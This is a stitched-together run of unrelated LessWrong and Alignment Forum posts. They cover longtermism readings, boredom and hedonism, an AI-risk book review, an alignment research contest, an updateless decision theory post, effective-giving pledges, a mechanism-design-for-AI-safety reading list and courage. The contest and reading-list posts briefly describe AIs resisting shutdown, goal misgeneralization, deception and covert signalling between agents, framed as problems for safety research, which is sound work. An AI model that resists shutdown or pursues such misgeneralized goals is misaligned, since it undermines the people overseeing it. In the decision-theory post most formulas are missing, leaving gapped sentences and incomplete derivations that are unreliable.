* Aschenbrenner, Leopold. 2020. “[Securing Posterity](https://worksinprogress.co/issue/securing-posterity)”
+ Prompt 3: How could faster economic growth turn out to decrease overall risk? What could be missing from this picture?
* MacAskill, William. 2022. *What We Owe The Future* (Chapter 7: Stagnation)
+ Prompt 4: Do you think stagnation is an important problem on its own? What is the most contentious premise behind the case for stagnation as a hugely important problem? What is the strongest case?
**Extra readings:**
* Aschenbrenner, Leopold. 2020. “[Existential Risk and Growth](https://globalprioritiesinstitute.org/wp-content/uploads/Leopold-Aschenbrenner_Existential-risk-and-growth_.pdf)”
Other issues in this space:
* How advanced AI might affect economic growth
* Can we use economic growth models to predict the longterm future and AGI?
Relevant readings:
* Davidson, Tom. 2021. “[Report on Whether AI Could Drive Explosive Economic Growth](https://www.openphilanthropy.org/research/report-on-whether-ai-could-drive-explosive-economic-growth/)”
* Trammell, Philip and Korinek, Anton. 2020. “[Economic growth under transformative AI](https://globalprioritiesinstitute.org/wp-content/uploads/Philip-Trammell-and-Anton-Korinek_economic-growth-under-transformative-ai.pdf)”
**Patient philanthropy**
------------------------
**Topic:**The optimal timing of funding altruistic projects and how this depends on one’s level of 'patience' in relation to that of other funders.
**Literature:**
* Trammell, Philip. 2021. “[Patient Philanthropy in an Impatient World](https://docs.google.com/document/d/1NcfTgZsqT9k30ngeQbappYyn-UO4vltjkm64n4or5r4/edit)” (sections 1 to 3)
+ Prompt 1: In the current philanthropy landscape, is it important to consider the kinds of strategic interactions Trammel points to? Why?
+ Prompt 2: Sections 2.3 and 2.4 give reasons to believe that philanthropists can act more patiently than governments. Do you think that this is a good argument in support of philanthropic spending from a social standpoint?
+ Prompt 3: To what extent do the funding areas of interest to patient and impatient philanthropy overlap?
+ Prompt 4: Evaluate [Open Philanthropy's decision to spend its entire budget in 20 years](https://forum.effectivealtruism.org/posts/FHJMKSwrwdTogYLGF/we-re-no-longer-pausing-most-new-longtermist-funding).
**Population**
--------------
**Goal and topic:** The size of the global population influences the well-being of present and future generations in various ways. For instance, *prima facie* more people drive more greenhouse gas emissions, which drives worse climate change. But also, more people drive more innovation. And more people means more potential for human well-being. In this session, we will evaluate the ways in which population size relates to and affects long-term global well-being.
**Literature:**
* Greaves, Hilary. 2017. “[Population axiology](https://philpapers.org/archive/GREPA-6.pdf)”
+ Prompt 1: Which population axiology do you find most intuitive?
+ Prompt 2: Which view do you find most plausible upon reflection?
* Siegmann, Charlotte and Mota, Luis. 2022. “[Assessing the case for population growth as a priority](https://forum.effectivealtruism.org/posts/6uwAXinuaxyssofBB/assessing-the-case-for-population-growth-as-a-priority)”
+ Prompt 3: How would the implications of this writeup change when considering the consequences of population growth over the course of the next 2 centuries?
+ Prompt 4: Do you believe that larger populations lead to more benefits or harms on net?
+ Prompt 5: All things considered, is the case for intervening on population growth strong enough to make it one of the most important areas for further global priorities research?
**Alternate Longtermism Session**
=================================
*This session goes more in depth into the philosophical issues surrounding longtermism.*
**Longtermism, existential risk, and cluelessness**
===================================================
**Topic:** This session is about longtermism, roughly the idea that we should focus on interventions that deliver their benefits in the longterm future. We will discuss the case for longtermism and whether uncertainty about the future undermines or supports it.
**Literature:**
* MacAskill, William. 2022. *What We Owe The Future* (Chapter 1: The Case for Longtermism)
+ Prompt 1: Do you agree with the case for longtermism? Which of the premises do you find most contentious?
* Tarsney, Christian. 2022. “[The Epistemic Challenge to Longtermism](https://globalprioritiesinstitute.org/wp-content/uploads/Tarsney-Epistemic-Challenge-to-Longtermism.pdf)”
+ Prompt 2: What does Tarsney’s model reveal to you about the presuppositions required for longtermism? Are these presuppositions true?
+ Prompt 3: In light of the arguments of this article, to what extent do you think longtermism supports interventions other than existential risk reduction (e.g. economic growth)?
* Greaves, Hilary. 2020. Talk: [“Evidence, cluelessness and the long term”](https://www.youtube.com/watch?v=fySZIYi2goY&ab_channel=CentreforEffectiveAltruism) (Watch from 7:41)
+ Prompt 4: Which of the responses to the worry of cluelessness do you find most compelling?
+ Prompt 5: What is the case for how cluelessness might support (as opposed to undermine) longtermism?
**Extra readings:**
* Ord, Toby. 2020. *The Precipice.*Chapter 2: Existential Risks.
* Greaves, Hilary. 2016. [“Cluelessness”](https://philarchive.org/rec/GREC-38)
* Eden, Maya and Alexandrie, Gustav. 2023. [“Is Existential Risk Mitigation Uniquely Cost-Effective? Not in Standard Population Models”](https://globalprioritiesinstitute.org/gustav-alexandrie-and-maya-eden-is-existential-risk-mitigation-uniquely-cost-effective-not-in-standard-population-models/)
1. **[^](#fnref4l1w64znngi)**See the alternate session on longtermism for a more in depth discussion of the key philosophical issues. |
9da74c76-76db-4aa1-a5a0-87f3487500c5 | trentmkelly/LessWrong-43k | LessWrong | Against Against Boredom
I'm trying to clarify some feelings I had after reading the post Utopic Nightmares. Specifically, this bit:
> But in a future world where advancing technology’s returns on the human condition stop compensating for a state less than perfect hedonism, we can imagine editing boredom out of our lives
I would like to describe a toy moral theory that--while not exactly what I believe--gets at why I would consider "eliminating boredom" morally objectionable.
Experience maximizing hedonism
Consider an agent that perceives external reality through a set of sensors S0,S1,...Sn . It uses these sensors to build a model of external reality and estimate it's position in that reality at a point in time as a state Mt. It also has a number of actions At,i available to it at any given time.
The agent estimates the number of reachable future states V(t)=E(|{Mis.t∃pathMt−>..−>Mi|}) and "chooses" its actions so as to maximize the value of R(t) for some future time t. Obviously if the agent is dead, it cannot perceive or affect its future state, so it estimates V(dead)=1.
Internally the agent is running some kind of hill-climbing algorithm, so it experiences a reward after choosing an action Ai,t at time t of the form R(t)=V(t)−V(t−1). In this way, the agent experiences pleasure when it takes actions that increase V(t) and pain when it takes actions that decrease V(t) and over time the agent learns to take actions that maximize V(t).
Infinite Boredom
Now consider the infinite boredom of Utopic Nightmares. In this case the agent reaches a local maximum for V(t) and R(t) is now constant (and equal to zero). But of course there is no reason why R(t) need be zero when V(t) is constant. There's no reason why we couldn't have instead used R(t)c=V(t)−V(t−1)+c for our hill-climb. The agent would experience endless bliss (for positive values of c) or endless suffering (for negative values of c). Human experience suggests that our personal setting for c is in fact significantly |
16613997-ac5d-47a9-8c2b-f09cb0fb92fe | trentmkelly/LessWrong-43k | LessWrong | Uncontrollable: A Surprisingly Good Introduction to AI Risk
I recently read Darren McKee's book "Uncontrollable: The Threat of Artificial Superintelligence and the Race to Save the World".
I recommend this book as the best current introduction to AI risk for people with limited AI background.
It prompted me to update my thinking about Asimov's Laws and related risks in light of recent evidence about AI capabilities. I've written a longer review that explains my thoughts in more detail.
The author has a LW account here. |
4c9bb60d-019c-4412-9ce5-4e7f6aa6f181 | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Announcing AI Alignment Awards: $100k research contests about goal misgeneralization & corrigibility
*We’re grateful to our advisors Nate Soares, John Wentworth, Richard Ngo, Lauro Langosco, and Amy Labenz. We're also grateful to Ajeya Cotra and Thomas Larsen for their feedback on the contests.*
**TLDR:** [**AI Alignment Awards**](https://alignmentawards.com) **is running two contests designed to raise awareness about AI alignment research and generate new research proposals. Prior experience with AI safety is not required. Promising submissions will win prizes up to $100,000** (though note that most prizes will be between $1k-$20k; we will only award higher prizes if we receive exceptional submissions.)
You can help us by sharing this post with people who are or might be interested in alignment research (e.g., student mailing lists, FB/Slack/Discord groups.)
What are the contests?
======================
We’re currently running two contests:
**Goal Misgeneralization Contest** (based on [Langosco et al., 2021](https://arxiv.org/abs/2105.14111)): AIs often learn unintended goals. Goal misgeneralization occurs when a reinforcement learning agent retains its capabilities out-of-distribution yet pursues the wrong goal. How can we prevent or detect goal misgeneralization?
**Shutdown Problem Contest** (based on [Soares et al., 2015](https://intelligence.org/files/Corrigibility.pdf)): Given that powerful AI systems might resist attempts to turn them off, how can we make sure they are open to being shut down?
What types of submissions are you interested in?
================================================
For the Goal Misgeneralization Contest, we’re interested in submissions that do at least one of the following:
1. Propose techniques for preventing or detecting goal misgeneralization
2. Propose ways for researchers to identify when goal misgeneralization is likely to occur
3. Identify new examples of goal misgeneralization in RL or non-RL domains. For example:
1. We might train an imitation learner to imitate a "non-consequentialist" agent, but it actually ends up learning a more consequentialist policy.
2. We might train an agent to be myopic (e.g., to only care about the next 10 steps), but it actually learns a policy that optimizes over a longer timeframe.
4. Suggest other ways to make progress on goal misgeneralization
For the Shutdown Problem Contest, we’re interested in submissions that do at least one of the following:
1. Propose ideas for solving the shutdown problem or designing corrigible AIs. These submissions should also include (a) explanations for how these ideas address core challenges raised in the corrigibility paper and (b) possible limitations and ways the idea might fail
2. Define The Shutdown Problem more rigorously or more empirically
3. Propose new ways of thinking about corrigibility (e.g., ways to understand corrigibility within a deep learning paradigm)
4. Strengthen [existing approaches](https://ai-alignment.com/training-robust-corrigibility-ce0e0a3b9b4d) to training corrigible agents (e.g., by making them more detailed, exploring new applications, or describing how they could be implemented)
5. Identify new challenges that will make it difficult to design corrigible agents
6. Suggest other ways to make progress on corrigibility
Why are you running these contests?
===================================
We think that corrigibility and goal misgeneralization are two of the most important problems that make AI alignment difficult. We expect that people who can reason well about these problems will be well-suited for alignment research, and we believe that progress on these subproblems would be meaningful advances for the field of AI alignment. We also think that many people could potentially contribute to these problems (we're only aware of a handful of serious attempts at engaging with these challenges). Moreover, we think that tackling these problems will offer a good way for people to "think like an alignment researcher."
We hope the contests will help us (a) find people who could become promising theoretical and empirical AI safety researchers, (b) raise awareness about corrigibility, goal misgeneralization, and other important problems relating to AI alignment, and (c) make actual progress on corrigibility and goal misgeneralization.
Who can participate?
====================
Anyone can participate.
What if I’ve never done AI alignment research before?
=====================================================
You can still participate. In fact, you’re our main target audience. One of the main purposes of AI Alignment Awards is to find people who *haven’t been doing alignment research* but *might be promising fits for alignment research*. If this describes you, consider participating. If this describes someone you know, consider sending this to them.
Note that we don’t expect newcomers to come up with a full solution to either problem (please feel free to prove us wrong, though). You should feel free to participate even if your proposal has limitations.
How can I help?
===============
You can help us by sharing this post with people who are or might be interested in alignment research (e.g., student mailing lists, FB/Slack/Discord groups) or specific individuals (e.g., your smart friend who is great at solving puzzles, learning about new topics, or writing about important research topics.)
Feel free to use the following message:
**AI Alignment Awards is offering up to $100,000 to anyone who can make progress on problems in alignment research. Anyone can participate.**[**Learn more and apply at alignmentawards.com!**](https://www.alignmentawards.com/)
Will advanced AI be beneficial or catastrophic? We think this will depend on our ability to align advanced AI with desirable goals – something researchers don’t yet know how to do.
We’re running contests to make progress on two key subproblems in alignment:
* **The Goal Misgeneralization Contest**(based on [Langosco et al., 2021](https://arxiv.org/abs/2105.14111)): AIs often learn unintended goals. Goal misgeneralization occurs when a reinforcement learning agent retains its capabilities out-of-distribution yet pursues the wrong goal. How can we prevent or detect goal misgeneralization?
* **The Shutdown Contest**(based on [Soares et al., 2015](https://intelligence.org/files/Corrigibility.pdf)): Advanced AI systems might resist attempts to turn them off. How can we design AI systems that are open to being shut down, even as they get increasingly advanced?
No prerequisites are required to participate. **EDIT:** The deadline has been extended to May 1, 2023.
To learn more about AI alignment, see [alignmentawards.com/resources](https://www.alignmentawards.com/resources).
Outlook
=======
We see these contests as one possible step toward making progress on corrigibility, goal misgeneralization, and AI alignment. With that in mind, we’re unsure about how useful the contest will be. The prompts are very open-ended, and the problems are challenging. At best, the contests could raise awareness about AI alignment research, identify particularly promising researchers, and help us make progress on two of the most important topics in AI alignment research. At worst, they could be distracting, confusing, and difficult for people to engage with (note that we’re offering awards to people who can define the problems more concretely.)
If you’re excited about the contest, we’d appreciate you sharing this post and the website ([alignmentawards.com](https://alignmentawards.com)) to people who might be interested in participating. We’d also encourage you to comment on this post if you have ideas you’d like to see tried. |
f0489993-6e10-4be9-aef9-0b5e608e7eaa | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | SUDT: A toy decision theory for updateless anthropics
The best approach I know for thinking about anthropic problems is Wei Dai's [Updateless Decision Theory](http://wiki.lesswrong.com/wiki/Updateless_decision_theory) (UDT). We aren't yet able to solve all problems that we'd like to—for example, when it comes to game theory, the only games we have any idea how to solve are very symmetric ones—but for many anthropic problems, UDT gives the obviously correct solution. However, UDT is somewhat underspecified, and [cousin\_it's concrete models of UDT](http://wiki.lesswrong.com/wiki/Ambient_decision_theory) based on formal logic are rather heavyweight if all you want is to figure out the solution to a simple anthropic problem.
In this post, I introduce a toy decision theory, *Simple Updateless Decision Theory* or SUDT, which is most definitely not a replacement for UDT but makes it easy to formally model and solve the kind of anthropic problems that we usually apply UDT to. (And, of course, it gives the same solutions as UDT.) I'll illustrate this with a few examples.
This post is a bit boring, because all it does is to take a bit of math that we already implicitly use all the time when we apply updateless reasoning to anthropic problems, and spells it out in excruciating detail. If you're already well-versed in that sort of thing, you're not going to learn much from this post. The reason I'm posting it anyway is that there are things I want to say about updateless anthropics, with a bit of simple math here and there, and while the math may be intuitive, the best thing I can point to in terms of details are the posts on UDT, which contain lots of irrelevant complications. So the main purpose of this post is to save people from having to reverse-engineer the simple math of SUDT from the more complex / less well-specified math of UDT.
(I'll also argue that Psy-Kosh's non-anthropic problem is a type of counterfactual mugging, I'll use the concept of [l-zombies](/lw/jkm/lzombies_lzombies/) to explain why UDT's response to this problem is correct, and I'll explain why this argument still works if there aren't any l-zombies.)
\*
I'll introduce SUDT by way of a first example: **the [counterfactual mugging](http://wiki.lesswrong.com/wiki/Counterfactual_mugging)**. In my preferred version, Omega appears to you and tells you that it has thrown a very biased coin, which had only a 1/1000 chance of landing heads; however, in this case, the coin has in fact fallen heads, which is why Omega is talking to you. It asks you to choose between two options, (H) and (T). If you choose (H), Omega will create a Friendly AI; if you choose (T), it will destroy the world. However, there is a catch: Before throwing the coin, Omega made a prediction about which of these options you would choose if the coin came up heads (and it was able to make a highly confident prediction). If the coin had come up tails, Omega would have destroyed the world if it's predicted that you'd choose (H), and it would have created a Friendly AI if it's predicted (T). (Incidentally, if it hadn't been able to make a confident prediction, it would just have destroyed the world outright.)
| | | |
| --- | --- | --- |
| | Coin falls **heads** (chance = 1/1000) | Coin falls **tails** (chance = 999/1000) |
| You choose **(H)** if coin falls heads | Positive intelligence explosion | Humanity wiped out |
| You choose **(T)** if coin falls heads | Humanity wiped out | Positive intelligence explosion |
In this example, we are considering two possible worlds:  and . We write  (no pun intended) for the set of all possible worlds; thus, in this case, . We also have a probability distribution over , which we call . In our example,  and .
In the counterfactual mugging, there is only one situation you might find yourself in in which you need to make a decision, namely when Omega tells you that the coin has fallen heads. In general, we write  for the set of all possible situations in which you might need to make a decision; the  stands for the *information* available to you, including both sensory input and your memories. In our case, we'll write , where  is the single situation where you need to make a decision.
For every , we write  for the set of possible *actions* you can take if you find yourself in situation . In our case,. A *policy* (or "plan") is a function  that associates to every situation  an action  to take in this situation. We write  for the set of all policies. In our case, , where  and .
Next, there is a set of *outcomes*, , which specify all the features of what happens in the world that make a difference to our final goals, and the *outcome function* , which for every possible world  and every policy  specifies the outcome  that results from executing  in the world . In our case,  (standing for FAI and DOOM), and  and .
Finally, we have a *utility function* . In our case,  and . (The exact numbers don't really matter, as long as , because utility functions don't change their meaning under affine transformations, i.e. when you add a constant to all utilities or multiply all utilities by a positive number.)
Thus, **an SUDT decision problem consists of the following ingredients:** The sets ,  and  of possible worlds, situations you need to make a decision in, and outcomes; for every , the set  of possible actions in that situation; the probability distribution ; and the outcome and utility functions  and . SUDT then says that you should choose a policy  that maximizes the expected utility , where  is the expectation with respect to , and  is the true world.
In our case,  is just the probability of the good outcome , according to the (prior) distribution . For , that probability is 1/1000; for , it is 999/1000. Thus, SUDT (like UDT) recommends choosing (T).
If you set up the problem in SUDT like that, it's kind of hidden why you could possibly think that's *not* the right thing to do, since we aren't distinguishing situations  that are "actually experienced" in a particular possible world ; there's nothing in the formalism that reflects the fact that Omega never asks us for our choice if the coin comes up tails. In [my post on l-zombies](/lw/jkm/lzombies_lzombies/), I've argued that this makes sense because even if there's no version of you that actually consciously experiences being in the heads world, this version still exists as a Turing machine and the choices that it makes influence what happens in the real world. If all mathematically possible experiences exist, so that there *aren't* any l-zombies, but some experiences are "experienced more" (have more "magical reality fluid") than others, the argument is even clearer—even if there's some anthropic sense in which, upon being told that the coin fell heads, you can conclude that you should assign a high probability of being in the heads world, *the same version of you still exists in the tails world*, and its choices influence what happens there. And if everything is experienced to the same degree (no magical reality fluid), the argument is clearer still.
\*
From Vladimir Nesov's counterfactual mugging, let's move on to what I'd like to call **Psy-Kosh's probably counterfactual mugging**, better known as [**Psy-Kosh's non-anthropic problem**](/lw/3dy/solve_psykoshs_nonanthropic_problem/). This time, you're not alone: Omega gathers you together with 999,999 other advanced rationalists, all well-versed in anthropic reasoning and SUDT. It places each of you in a separate room. Then, as before, it throws a very biased coin, which has only a 1/1000 chance of landing heads. If the coin *does* land heads, then Omega asks all of you to choose between two options, (H) and (T). If the coin falls *tails*, on the other hand, Omega chooses one of you at random and asks that person to choose between (H) and (T). If the coin lands heads and you all choose (H), Omega will create a Friendly AI; same if the coin lands tails, and the person who's asked chooses (T); else, Omega will destroy the world.
| | | |
| --- | --- | --- |
| | Coin falls **heads** (chance = 1/1000) | Coin falls **tails** (chance = 999/1000) |
| Everyone chooses **(H)** if asked | Positive intelligence explosion | Humanity wiped out |
| Everyone chooses **(T)** if asked | Humanity wiped out | Positive intelligence explosion |
| Different people choose differently | Humanity wiped out | (Depends on who is asked) |
We'll assume that all of you prefer a positive FOOM over a gloomy DOOM, which means that all of you have the same values as far as the outcomes of this little dilemma are concerned: , as before, and all of you have the same utility function, given by  and . As long as that's the case, we can apply SUDT to find a sensible policy for everybody to follow (though when there is more than one optimal policy, and the different people involved can't talk to each other, it may not be clear how one of the policies should be chosen).
This time, we have a million different people, who can in principle each make an independent decision about what to answer if Omega asks them the question. Thus, we have . Each of these people can choose between (H) and (T), so  for every person , and a policy  is a function that returns either (H) or (T) for every . Obviously, we're particularly interested in the policies  and  satisfying  and  for all .
The possible worlds are ,\dotsc,(%5Ctext%7Btails%7D,10^6)%5C%7D), and their probabilities are  and %29%20=%20%5Cfrac%7B999%7D%7B1000%7D%5Ccdot10^%7B-6%7D). The outcome function is as follows: ,  for , ,\pi)=(%2B)) if =(\mathrm{T})), and  otherwise.
What does SUDT recommend? As in the counterfactual mugging,  is the probability of the good outcome , under policy . For , the good outcome can only happen if the coin falls heads: in other words, with probability . If , then the good outcome can *not* happen if the coin falls heads, because in that case everybody gets asked, and at least one person chooses (T). Thus, in this case, the good outcome will happen only if the coin comes up tails and the randomly chosen person answers (T); this probability is , where  is the number of people answering (T). Clearly, this is maximized for , where ; moreover, in this case we get the probability , which is better than for , so SUDT recommends the plan .
Again, when you set up the problem in SUDT, it's not even obvious why anyone might think this *wasn't* the correct answer. The reason is that if Omega asks you, and you update on the fact that you've been asked, then after updating, you are quite certain that the coin has landed *heads*: yes, your prior probability was only 1/1000, but if the coin has landed tails, the chances that *you* would be asked was only one in a million, so the posterior odds are about 1000:1 in favor of heads. So, you might reason, it would be best if everybody chose (H); and moreover, all the people in the other rooms will reason the same way as you, so if you choose (H), they will as well, and this maximizes the probability that humanity survives. This relies on the fact that the others will choose the same way as you, but since you're all good rationalists using the same decision theory, that's going to be the case.
But in the worlds where the coin comes up tails, and Omega chooses someone else than you, the version of you that gets asked for its decision still "exists"... as an l-zombie. You might think that what this version of you does or doesn't do doesn't influence what happens in the real world; but if we accept the argument from the previous paragraph that your decisions are "linked" to those of the other people in the experiment, then they're *still* linked if the version of you making the decision is an l-zombie: If we see you as a Turing machine making a decision, that Turing machine should reason, "If the coin came up tails and someone else was chosen, then I'm an l-zombie, but the person who is actually chosen will reason exactly the same way I'm doing now, and will come to the same decision; hence, my decision influences what happens in the real world even in this case, and I can't do an update and just ignore those possible worlds."
I call this the "probably counterfactual mugging" because in the counterfactual mugging, you are making your choice because of its benefits in a possible world that is *ruled out* by your observations, while in the probably counterfactual mugging, you're making it because of its benefits in a set of possible worlds that is made *very improbable* by your observations (because *most* of the worlds in this set are ruled out). As with the counterfactual mugging, this argument is just all the stronger if there are no l-zombies because all mathematically possible experiences are in fact experienced.
\*
As a final example, let's look at what I'd like to call [**Eliezer's anthropic mugging**](/lw/17c/outlawing_anthropics_an_updateless_dilemma/): the anthropic problem that inspired Psy-Kosh's non-anthropic one. This time, you're alone again, except that there's many of you: Omega is creating a million copies of you. It flips its usual very biased coin, and if that coin falls heads, it places all of you in exactly identical green rooms. If the coin falls tails, it places *one* of you in a green room, and all the others in red rooms. It then asks all copies in green rooms to choose between (H) and (T); if your choice agrees with the coin, FOOM, else DOOM.
| | | |
| --- | --- | --- |
| | Coin falls **heads** (chance = 1/1000) | Coin falls **tails** (chance = 999/1000) |
| Green roomers choose **(H)** | Positive intelligence explosion | Humanity wiped out |
| Green roomers choose **(T)** | Humanity wiped out | Positive intelligence explosion |
Our possible worlds are back to being , with probabilities  and . We are also back to being able to make a choice in only one particular situation, namely when you're a copy in a green room: . Actions are , outcomes , utilities  and , and the outcome function is given by  and . In other words, from SUDT's perspective, this is *exactly identical* to the situation with the counterfactual mugging, and thus the solution is the same: Once more, SUDT recommends choosing (T).
On the other hand, the reason why someone might think that (H) could be the right answer is closer to that for Psy-Kosh's probably counterfactual mugging: After waking up in a green room, what should be your posterior probability that the coin has fallen heads? Updateful anthropic reasoning says that you should be quite sure that it has fallen heads. If you plug those probabilities into an expected utility calculation, it comes out as in Psy-Kosh's case, heavily favoring (H).
But even if these are good probabilities to assign epistemically (to satisfy your curiosity about what the world probably looks like), in light of the arguments from the counterfactual and the probably counterfactual muggings (where updating *definitely* is the right thing to do epistemically, but plugging these probabilities into the expected utility calculation gives the wrong result), it doesn't seem strange to me to come to the conclusion that choosing (T) is correct in Eliezer's anthropic mugging as well. |
e2030c6c-82be-4c7f-b321-9e1a4b53b820 | trentmkelly/LessWrong-43k | LessWrong | Is the 10% Giving What We Can Pledge Core to EA's Reputation?
Introduction
> I don't think the 10% norm forms a major part of EA's public perception, so I don't believe tweaking it would make any difference. - RobertJones
>
> 10% effective donations has brand recognition and is a nice round number, as you point out. -- mhendric
These two comments both received agreement upvotes on my recent post Further defense of the 2% fuzzies/8% EA causes pledge proposal, and although they're differently worded and not irreconcileable, they seem basically to stand in contradiction with each other. Is the 10% Giving What We Can pledge, in which participants commit to donating 10% of their annual income to an effective charity, part of EA's brand or reputation?
Tl;dr
* The Giving What We Can 10% pledge is often featured in prominent coverage of EA
* Broader notions of earning to give, giving specifically to effective charities, and donating a 10%+ fraction of one's income are even more common themes
* Giving What We Can is widely mentioned within EA, sees itself as "one of the shop fronts" for the movement, the pledge itself gets mentioned fairly often, and it's an important driver of EA participation.
* Giving What We Can is a core part of the EA movement and the pledge is core to GWWC.
* Criticism of EA often focuses on specific aspects of the GWWC pledge:
* Can we really draw a line while maintaining intellectual rigor?
* Is 10% the right line to draw?
* Should 100% of what we donate be specifically to what EA deems to be effective charities, or is it OK to also donate to pet causes like the arts?
* More broadly, is EA too focused on its own ideas - a failure of moral cosmopolitanism? Does EA need to incorporate or make some concession to the values of other cultural, moral, or political movements?
This does not resolve the question of how core the specific idea of a 10% pledge of one's income to effective charities is to the EA movement or to its reputation. But the pledge is provocative and the fact that so many EAs |
524cffcf-0603-4f50-8fb7-5b37bd9d3b9f | trentmkelly/LessWrong-43k | LessWrong | Welcome to Less Wrong!, part 2?
Welcome to Less Wrong! has over 1300 comments, but the display only offers 500 newest or 500 oldest, which makes it difficult if anyone wants to look at the whole thing. At a minimum, I recommend a second Welcome! post, but it might also be good to break up the first one (Welcome 1a and 1b, perhaps), and have a policy of a new Welcome post every 700 comments or so. |
6e7195b9-0948-4422-8e7e-76d979e81dda | StampyAI/alignment-research-dataset/eaforum | Effective Altruism Forum | Mechanism Design for AI Safety - Reading Group Curriculum
The Mechanism Design for AI Safety (MDAIS) reading group, announced [here](https://forum.effectivealtruism.org/posts/YmvBu7fuuYEr3hhnh/announcing-mechanism-design-for-ai-safety-reading-group), is currently in it's eighth of twelve weeks. I'm very excited by the quality of discussions we've had so far, and for the potential of future work from members of this group. If you're interested in working at the intersection of mechanism design and AI safety, please send me a message so that I can keep you in mind for future opportunities.
Edit: we have completed this initial list and are now meeting on a monthly basis. You can sign up to attend the meetings [here](https://docs.google.com/forms/d/1p-R-WIuTaLabx2RNEXdP2_KdISj_yCPh4H9vX-ZnA3c).
A number of people have reached out to ask me for the reading list we're using. Until now, I've had to tell them that it was still being developed, but at long last it has been finalized. This post is to communicate the list publicly for anyone curious about what we've been discussing, or who would like to follow along themselves. It goes week by week listing the papers covered, the topics of discussion, and any notes I have. After the first two weeks, the order of the papers covered is largely inconsequential.
Reading List
------------
### Week 1
Papers:
1. The Principal-Agent Alignment Problem in Artificial Intelligence by Dylan Hadfield-Menell
2. Incomplete Contracting and AI Alignment by Dylan Hadfield-Menell and Gillian Hadfield
Discussion: Introductions, formalization of the alignment problem, inverse reinforcement learning and cooperative inverse reinforcement learning
Notes: The Principal-Agent Alignment Problem in Artificial Intelligence is extremely long, essentially multiple papers concatenated, so discussing it in the first week gave people more prep time to read it. Incomplete Contracting and AI Alignment is much shorter and less formal but did not add much, in hindsight I would not had included it.
### Week 2
Paper: Risks from Learned Optimization in Advanced Machine Learning Systems by Evan Hubinger, Chris van Merwijk, Vladimir Mikulik, Joar Skalse, and Scott Garrabrant
Discussion: Inner vs. outer alignment, what applications mechanism design has for each "step" in alignment
### Week 3
Paper: Decision Scoring Rules (Extended Version) by Caspar Oesterheld and Vincent Conitzer
Discussion: Oracle AI, making predictions safely
### Week 4
Paper: Discovering Agents by Zachary Kenton, Ramana Kumar, Sebastian Farquhar, Jonathan Richens, Matt MacDermott, and Tom Everitt
Discussion: Defining agents, using causal influence diagrams in AI safety
### Week 5
Papers:
1. Model-Free Opponent Shaping by Chris Lu, Timon Willi, Christian Schroeder de Witt, and Jakob Foerster
2. The Good Shepherd: An Oracle Agent for Mechanism Design by Jan Balaguer, Raphael Koster, Christopher Summerfield, and Andrea Tacchetti
Discussion: Mechanism design affecting learning, how deception might arise
Notes: Almost everything in The Good Shepherd was also covered in Model-Free Opponent Shaping, so in hindsight including it as well was redundant.
### Week 6
Paper: Fully General Online Imitation Learning by Michael Cohen, Marcus Hutter, and Neel Nanda
Discussion: Advantages, disadvantages, and extensions for the mechanism proposed in the paper
### Week 7
Papers:
1. Corrigibility by Nate Soares, Benja Fallenstein, Eliezer Yudkowsky, and Stuart Armstrong
2. The Off Switch Game by Dylan Hadfield-Menell, Anca Dragan, Pieter Abbeel, and Stuart Russell
Discussion: Formalizing issues with corrigibility, approaches to instill corrigibility
### Week 8
Paper: Investment Incentives in Truthful Approximation Mechanisms by Mohammad Akbarpour, Scott Kominers, Kevin Li, Shengwu Li, and Paul Milgrom
Discussion: Implementing mechanisms with AI, issues with approximation
### Week 9
Paper: Cooperation, Conflict, and Transformative Artificial Intelligence - A Research Agenda by Jesse Clifton
Discussion: Various topics from the agenda with a focus on S-risks and bargaining
### Week 10
Paper: Getting Dynamic Implementation to Work (excluding sections 3 and 4) by Yi-Chun Chen, Richard Holden, Takashi Kunimoto, Yifei Sun, and Tom Wilkening
Discussion: Ensemble models, AI monitoring AI
Notes: Sections 3 and 4 of the paper were excluded as they focus on experimental results with humans, which are of minimal relevance.
### Week 11
Papers:
1. Learning to Communicate with Deep Multi-Agent Reinforcement Learning by Jakob N. Foerster, Yannis M. Assael, Nando de Freitas, and Shimon Whiteson
2. Emergent Cover Signaling in Adversarial Reference Games by Dhara Yu, Jesse Mu, and Noah Goodman
Discussion: Detecting communication, intercepting communication
### Week 12
Paper: Functional Decision Theory: A New Theory of Instrumental Rationality by Eliezer Yudkowsky and Nate Soares
Discussion: Functional decision theory, mechanism design for superrational agents and functional decision theorists
Next Steps
----------
Once we have finished going through this reading list, I would like to move to a more infrequent and irregular schedule. Meetings would be to discuss new developments in the space, the research produced by reading groups members, or topics missed during the first twelve weeks. I expect this ongoing reading group would expand beyond the initial members and be open to anyone interested.
If there is sufficient interest, another iteration going through the above reading list can be run, although likely with several updates.
Finally, we plan to collaborate on an agenda laying out promising research directions in the intersection mechanism design and AI safety. Ideally, we will have interested members transition to a working group where we can collaborate on research to address the challenge of ensuring AI is a positive development for humanity.
Edit: We have completed the initial readings and are now meeting once a month for further readings. You can sign up to be notified [here](https://docs.google.com/forms/d/1p-R-WIuTaLabx2RNEXdP2_KdISj_yCPh4H9vX-ZnA3c/edit).
Ongoing Readings
----------------
### Meeting 13
Paper: Safe Pareto Improvements for Delegated Game Playing by Caspar Oesterheld and Vince Conitzer
### Meeting 14
Papers:
1. Quantilizers: A Safer Alternative to Maximizers for Limited Optimization by Jessica Taylor
2. Safety Considerations for Online Generative Modeling by Sam Marks
### Meeting 16
Paper: A Robust Bayesian Truth Serum for Small Populations by Jens Witkowski and David C. Parkes
### Meeting 17
Paper: Misspecification in Inverse Reinforcement Learning by Joar Skalse and Alessandro Abate
### Meeting 18
Paper: Hidden Incentives for Auto-Induced Distributional Shift by David Krueger, Tegan Maharaj, and Jan Leike
### Meeting 19
Paper: Evolution of Preferences by Eddie Dekel, Jeffrey Ely, and Okan Yilankaya
### Meeting 20
Paper: A Theory of Rule Development by Gleen Ellison and Richard Holden |
eff3f8b8-4bfa-40d9-b70f-0e60d470ccf2 | trentmkelly/LessWrong-43k | LessWrong | Set image dimensions using markdown
When embedding an image using the markdown editor, is it possible to specify the image dimensions? It seems that both of these do not work:
Inline HTML:
<img src="https://i.imgur.com/25Magmb.png" width="123" height="123">
Some markdown variant I found on stackoverflow:

|
d85ff03b-6ee5-4eae-8fca-119b0b779b4f | trentmkelly/LessWrong-43k | LessWrong | Notes on Courage
This post examines the virtue of courage and explores some practical strategies for becoming more courageous.
Courage (sometimes “bravery” or the closely-related virtue of “valor”) is one of the most frequently mentioned virtues in virtue-oriented traditions. It was one of the four “cardinal virtues” of ancient Greece, for example.
